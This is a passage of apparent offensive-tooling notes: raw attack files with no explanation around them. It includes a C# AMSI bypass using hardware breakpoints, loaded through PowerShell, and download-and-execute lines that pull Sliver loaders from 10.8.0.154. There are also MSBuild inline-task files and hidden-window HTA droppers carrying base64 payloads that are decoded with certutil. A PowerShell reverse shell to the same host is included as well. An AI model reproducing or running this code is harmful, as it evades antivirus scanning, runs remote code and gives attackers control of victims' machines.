public ulong Dr7;
public ulong Rax;
public ulong Rcx;
public ulong Rdx;
public ulong Rbx;
public ulong Rsp;
public ulong Rbp;
public ulong Rsi;
public ulong Rdi;
public ulong R8;
public ulong R9;
public ulong R10;
public ulong R11;
public ulong R12;
public ulong R13;
public ulong R14;
public ulong R15;
public ulong Rip;
public XSAVE_FORMAT64 DUMMYUNIONNAME;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
public M128A[] VectorRegister;
public ulong VectorControl;
public ulong DebugControl;
public ulong LastBranchToRip;
public ulong LastBranchFromRip;
public ulong LastExceptionToRip;
public ulong LastExceptionFromRip;
}
[StructLayout(LayoutKind.Sequential)]
public struct EXCEPTION_RECORD
{
public uint ExceptionCode;
public uint ExceptionFlags;
public IntPtr ExceptionRecord;
public IntPtr ExceptionAddress;
public uint NumberParameters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 15, ArraySubType = UnmanagedType.U4)] public uint[] ExceptionInformation;
}
[StructLayout(LayoutKind.Sequential)]
public struct EXCEPTION_POINTERS
{
public IntPtr pExceptionRecord;
public IntPtr pContextRecord;
}
}
}
"@
Add-Type -TypeDefinition $HWBP
[HWBP.Amsi]::Bypass()
(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/sliverphollow64.txt') | IEXamsi86.txt
vim amsi86.txt
$HWBP = @"
using System;
using System.Collections.Generic;
using System.Linq.Expressions;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace HWBP
{
public class Amsi
{
static string a = "msi";
static string b = "anB";
static string c = "ff";
static IntPtr BaseAddress = WinAPI.LoadLibrary("a" + a + ".dll");
static IntPtr pABuF = WinAPI.GetProcAddress(BaseAddress, "A" + a + "Sc" + b + "u" + c + "er");
static IntPtr pCtx = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(WinAPI.CONTEXT64)));
public static void Bypass()
{
WinAPI.CONTEXT64 ctx = new WinAPI.CONTEXT64();
ctx.ContextFlags = WinAPI.CONTEXT64_FLAGS.CONTEXT64_ALL;
MethodInfo method = typeof(Amsi).GetMethod("Handler", BindingFlags.Static | BindingFlags.Public);
IntPtr hExHandler = WinAPI.AddVectoredExceptionHandler(1, method.MethodHandle.GetFunctionPointer());
Marshal.StructureToPtr(ctx, pCtx, true);
bool b = WinAPI.GetThreadContext((IntPtr)(-2), pCtx);
ctx = (WinAPI.CONTEXT64)Marshal.PtrToStructure(pCtx, typeof(WinAPI.CONTEXT64));
EnableBreakpoint(ctx, pABuF, 0);
WinAPI.SetThreadContext((IntPtr)(-2), pCtx);
}
public static long Handler(IntPtr exceptions)
{
WinAPI.EXCEPTION_POINTERS ep = new WinAPI.EXCEPTION_POINTERS();
ep = (WinAPI.EXCEPTION_POINTERS)Marshal.PtrToStructure(exceptions, typeof(WinAPI.EXCEPTION_POINTERS));
WinAPI.EXCEPTION_RECORD ExceptionRecord = new WinAPI.EXCEPTION_RECORD();
ExceptionRecord = (WinAPI.EXCEPTION_RECORD)Marshal.PtrToStructure(ep.pExceptionRecord, typeof(WinAPI.EXCEPTION_RECORD));
WinAPI.CONTEXT64 ContextRecord = new WinAPI.CONTEXT64();
ContextRecord = (WinAPI.CONTEXT64)Marshal.PtrToStructure(ep.pContextRecord, typeof(WinAPI.CONTEXT64));
if (ExceptionRecord.ExceptionCode == WinAPI.EXCEPTION_SINGLE_STEP && ExceptionRecord.ExceptionAddress == pABuF)
{
ulong ReturnAddress = (ulong)Marshal.ReadInt64((IntPtr)ContextRecord.Rsp);
IntPtr ScanResult = Marshal.ReadIntPtr((IntPtr)(ContextRecord.Rsp + (6 * 8))); // 5th arg, swap it to clean
Marshal.WriteInt32(ScanResult, 0, WinAPI.AMSI_RESULT_CLEAN);
ContextRecord.Rip = ReturnAddress;
ContextRecord.Rsp += 8;
ContextRecord.Rax = 0; // S_OK
Marshal.StructureToPtr(ContextRecord, ep.pContextRecord, true); //Paste our altered ctx back in TO THE RIGHT STRUCT
return WinAPI.EXCEPTION_CONTINUE_EXECUTION;
}
else
{
return WinAPI.EXCEPTION_CONTINUE_SEARCH;
}
}
public static void EnableBreakpoint(WinAPI.CONTEXT64 ctx, IntPtr address, int index)
{
switch (index)
{
case 0:
ctx.Dr0 = (ulong)address.ToInt64();
break;
case 1:
ctx.Dr1 = (ulong)address.ToInt64();
break;
case 2:
ctx.Dr2 = (ulong)address.ToInt64();
break;
case 3:
ctx.Dr3 = (ulong)address.ToInt64();
break;
}
ctx.Dr7 = SetBits(ctx.Dr7, 16, 16, 0);
ctx.Dr7 = SetBits(ctx.Dr7, (index * 2), 1, 1);
ctx.Dr6 = 0;
Marshal.StructureToPtr(ctx, pCtx, true);
}
public static ulong SetBits(ulong dw, int lowBit, int bits, ulong newValue)
{
ulong mask = (1UL << bits) - 1UL;
dw = (dw & ~(mask << lowBit)) | (newValue << lowBit);
return dw;
}
}
public class WinAPI
{
public const UInt32 DBG_CONTINUE = 0x00010002;
public const UInt32 DBG_EXCEPTION_NOT_HANDLED = 0x80010001;
public const Int32 EXCEPTION_CONTINUE_EXECUTION = -1;
public const Int32 EXCEPTION_CONTINUE_SEARCH = 0;
public const Int32 CREATE_PROCESS_DEBUG_EVENT = 3;
public const Int32 CREATE_THREAD_DEBUG_EVENT = 2;
public const Int32 EXCEPTION_DEBUG_EVENT = 1;
public const Int32 EXIT_PROCESS_DEBUG_EVENT = 5;
public const Int32 EXIT_THREAD_DEBUG_EVENT = 4;
public const Int32 LOAD_DLL_DEBUG_EVENT = 6;
public const Int32 OUTPUT_DEBUG_STRING_EVENT = 8;
public const Int32 RIP_EVENT = 9;
public const Int32 UNLOAD_DLL_DEBUG_EVENT = 7;
public const UInt32 EXCEPTION_ACCESS_VIOLATION = 0xC0000005;
public const UInt32 EXCEPTION_BREAKPOINT = 0x80000003;
public const UInt32 EXCEPTION_DATATYPE_MISALIGNMENT = 0x80000002;
public const UInt32 EXCEPTION_SINGLE_STEP = 0x80000004;
public const UInt32 EXCEPTION_ARRAY_BOUNDS_EXCEEDED = 0xC000008C;
public const UInt32 EXCEPTION_INT_DIVIDE_BY_ZERO = 0xC0000094;
public const UInt32 DBG_CONTROL_C = 0x40010006;
public const UInt32 DEBUG_PROCESS = 0x00000001;
public const UInt32 CREATE_SUSPENDED = 0x00000004;
public const UInt32 CREATE_NEW_CONSOLE = 0x00000010;
public const Int32 AMSI_RESULT_CLEAN = 0;
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool SetThreadContext(IntPtr hThread, IntPtr lpContext);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetThreadContext(IntPtr hThread, IntPtr lpContext);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);
[DllImport("Kernel32.dll")]
public static extern IntPtr AddVectoredExceptionHandler(uint First, IntPtr Handler);
[Flags]
public enum CONTEXT64_FLAGS : uint
{
CONTEXT64_AMD64 = 0x100000,
CONTEXT64_CONTROL = CONTEXT64_AMD64 | 0x01,
CONTEXT64_INTEGER = CONTEXT64_AMD64 | 0x02,
CONTEXT64_SEGMENTS = CONTEXT64_AMD64 | 0x04,
CONTEXT64_FLOATING_POINT = CONTEXT64_AMD64 | 0x08,
CONTEXT64_DEBUG_REGISTERS = CONTEXT64_AMD64 | 0x10,
CONTEXT64_FULL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_FLOATING_POINT,
CONTEXT64_ALL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_SEGMENTS | CONTEXT64_FLOATING_POINT | CONTEXT64_DEBUG_REGISTERS
}
[StructLayout(LayoutKind.Sequential)]
public struct M128A
{
public ulong High;
public long Low;
public override string ToString()
{
return string.Format("High:{0}, Low:{1}", this.High, this.Low);
}
}
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct XSAVE_FORMAT64
{
public ushort ControlWord;
public ushort StatusWord;
public byte TagWord;
public byte Reserved1;
public ushort ErrorOpcode;
public uint ErrorOffset;
public ushort ErrorSelector;
public ushort Reserved2;
public uint DataOffset;
public ushort DataSelector;
public ushort Reserved3;
public uint MxCsr;
public uint MxCsr_Mask;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public M128A[] FloatRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public M128A[] XmmRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
public byte[] Reserved4;
}
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct CONTEXT64
{
public ulong P1Home;
public ulong P2Home;
public ulong P3Home;
public ulong P4Home;
public ulong P5Home;
public ulong P6Home;
public CONTEXT64_FLAGS ContextFlags;
public uint MxCsr;
public ushort SegCs;
public ushort SegDs;
public ushort SegEs;
public ushort SegFs;
public ushort SegGs;
public ushort SegSs;
public uint EFlags;
public ulong Dr0;
public ulong Dr1;
public ulong Dr2;
public ulong Dr3;
public ulong Dr6;
public ulong Dr7;
public ulong Rax;
public ulong Rcx;
public ulong Rdx;
public ulong Rbx;
public ulong Rsp;
public ulong Rbp;
public ulong Rsi;
public ulong Rdi;
public ulong R8;
public ulong R9;
public ulong R10;
public ulong R11;
public ulong R12;
public ulong R13;
public ulong R14;
public ulong R15;
public ulong Rip;
public XSAVE_FORMAT64 DUMMYUNIONNAME;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
public M128A[] VectorRegister;
public ulong VectorControl;
public ulong DebugControl;
public ulong LastBranchToRip;
public ulong LastBranchFromRip;
public ulong LastExceptionToRip;
public ulong LastExceptionFromRip;
}
[StructLayout(LayoutKind.Sequential)]
public struct EXCEPTION_RECORD
{
public uint ExceptionCode;
public uint ExceptionFlags;
public IntPtr ExceptionRecord;
public IntPtr ExceptionAddress;
public uint NumberParameters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 15, ArraySubType = UnmanagedType.U4)] public uint[] ExceptionInformation;
}
[StructLayout(LayoutKind.Sequential)]
public struct EXCEPTION_POINTERS
{
public IntPtr pExceptionRecord;
public IntPtr pContextRecord;
}
}
}
"@
Add-Type -TypeDefinition $HWBP
[HWBP.Amsi]::Bypass()
(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/sliverphollow86.txt') | IEX
sliver64.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.IO" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From Fragment");
]]>
</Code>
</Task>
</UsingTask>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
String cmd = @"(New-Object Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | iex";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
sliver86.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.IO" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From Fragment");
]]>
</Code>
</Task>
</UsingTask>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
String cmd = @"(New-Object Net.WebClient).DownloadString('http://10.8.0.154/amsi86.txt') | iex";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
encode sliver64.xml
base64 -w 0 sliver64.xml > sliver_base64.txt
sliver64.hta
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var re = shell.Run("powershell -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEwLjguMC4xNTQvYW1zaTY0LnR4dCcpIHwgaWV4IjsKICAgICAgICAgICAgUnVuc3BhY2UgcnMgPSBSdW5zcGFjZUZhY3RvcnkuQ3JlYXRlUnVuc3BhY2UoKTsKICAgICAgICAgICAgcnMuT3BlbigpOwogICAgICAgICAgICBQb3dlclNoZWxsIHBzID0gUG93ZXJTaGVsbC5DcmVhdGUoKTsKICAgICAgICAgICAgcHMuUnVuc3BhY2UgPSByczsKICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7CiAgICAgICAgICAgIHBzLkludm9rZSgpOwogICAgICAgICAgICBycy5DbG9zZSgpOwogICAgICAgICAgICByZXR1cm4gdHJ1ZTsKCgogICAgICAgICAgICAgICAgfQoKCiAgICAgICAgICAgIH0KCgoKCiAgICAgICAgXV0+CiAgICAgIDwvQ29kZT4KICAgIDwvVGFzaz4KICA8L1VzaW5nVGFzaz4KPC9Qcm9qZWN0Pgo= > c:\\windows\\temp\\enc6.txt;certutil -decode c:\\windows\\temp\\enc6.txt c:\\windows\\temp\\g.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\g.xml")
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
sliver86.hta
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var re = shell.Run("powershell -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzE5Mi4xNjguNDUuMjQ4L2Ftc2k4Ni50eHQnKSB8IGlleCI7CiAgICAgICAgICAgIFJ1bnNwYWNlIHJzID0gUnVuc3BhY2VGYWN0b3J5LkNyZWF0ZVJ1bnNwYWNlKCk7CiAgICAgICAgICAgIHJzLk9wZW4oKTsKICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7CiAgICAgICAgICAgIHBzLlJ1bnNwYWNlID0gcnM7CiAgICAgICAgICAgIHBzLkFkZFNjcmlwdChjbWQpOwogICAgICAgICAgICBwcy5JbnZva2UoKTsKICAgICAgICAgICAgcnMuQ2xvc2UoKTsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CgoKICAgICAgICAgICAgICAgIH0KCgogICAgICAgICAgICB9CgoKCgogICAgICAgIF1dPgogICAgICA8L0NvZGU+CiAgICA8L1Rhc2s+CiAgPC9Vc2luZ1Rhc2s+CjwvUHJvamVjdD4K > c:\\windows\\temp\\enc6.txt;certutil -decode c:\\windows\\temp\\enc6.txt c:\\windows\\temp\\g.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\g.xml")
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
large1.ps1
$TCPClient = New-Object Net.Sockets.TCPClient('10.8.0.154', 1234)
$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
function WriteToStream ($String) {
[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | ForEach-Object {0}
$StreamWriter.Write($String + 'SHELL> ')
$StreamWriter.Flush()
}p
WriteToStream ''
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}
WriteToStream ($Output)
}
$StreamWriter.Close()
large1.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.IO" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From Fragment");
]]>
</Code>
</Task>
</UsingTask>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
String cmd = @"(New-Object Net.WebClient).DownloadString('http://10.8.0.154/large1.ps1') | iex";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
large1.hta
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
